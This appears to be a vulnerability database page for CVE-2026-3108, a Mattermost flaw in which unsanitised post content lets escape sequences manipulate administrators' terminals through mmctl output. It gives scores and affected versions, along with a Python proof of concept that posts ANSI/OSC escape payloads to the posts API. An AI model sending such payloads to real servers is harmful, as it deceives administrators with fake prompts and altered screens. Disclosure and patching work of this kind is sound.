CVE-2026-3108

Description

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking.. Mattermost Advisory ID: MMSA-2026-00599

CVSS Details

CVSS Score

8.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:* - VULNERABLE

Mattermost 11.2.x <= 11.2.2

Mattermost 10.11.x <= 10.11.10

Mattermost 11.4.x <= 11.4.0

Mattermost 11.3.x <= 11.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-3108 Mattermost Terminal Injection
# This script demonstrates sending a message containing ANSI/OSC escape sequences
# to manipulate the administrator's terminal when viewed via mmctl.

import requests

# Configuration
TARGET_URL = "https://mattermost.example.com/api/v4/posts"
AUTH_TOKEN = "YOUR_TOKEN_HERE"
CHANNEL_ID = "TARGET_CHANNEL_ID"

# Payload explanation:
# \033[2J : Clears the screen
# \033[31m : Sets text color to red
# \033]0;COMPROMISED\a : Changes the window title
payload_text = "\033[2J\033[31mSECURITY ALERT: Terminal compromised via CVE-2026-3108\033[0m\n\033]0;HACKED\a"

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

data = {
    "channel_id": CHANNEL_ID,
    "message": payload_text
}

# Send the malicious message
response = requests.post(TARGET_URL, headers=headers, json=data)

if response.status_code == 201:
    print("Payload sent successfully. Check mmctl output.")
else:
    print(f"Failed to send payload: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3108
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3108
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3108/
[4] VulDB https://vuldb.com/cve/CVE-2026-3108
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3108", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:41.797", "lastModified": "2026-03-30T19:45:27.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking.. Mattermost Advisory ID: MMSA-2026-00599"}, {"lang": "es", "value": "Las versiones de Mattermost 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 no logran sanear el contenido de publicaciones controlado por el usuario en la salida de terminal de los comandos mmctl, lo que permite a los atacantes manipular las terminales de los administradores a través de mensajes elaborados que contienen secuencias de escape ANSI y OSC que habilitan la manipulación de pantalla, avisos falsos y el secuestro del portapapeles. ID de aviso de Mattermost: MMSA-2026-00599"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-150"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.2", "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "7B6A1FE2-D980-4755-A838-190A53A4D62B"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}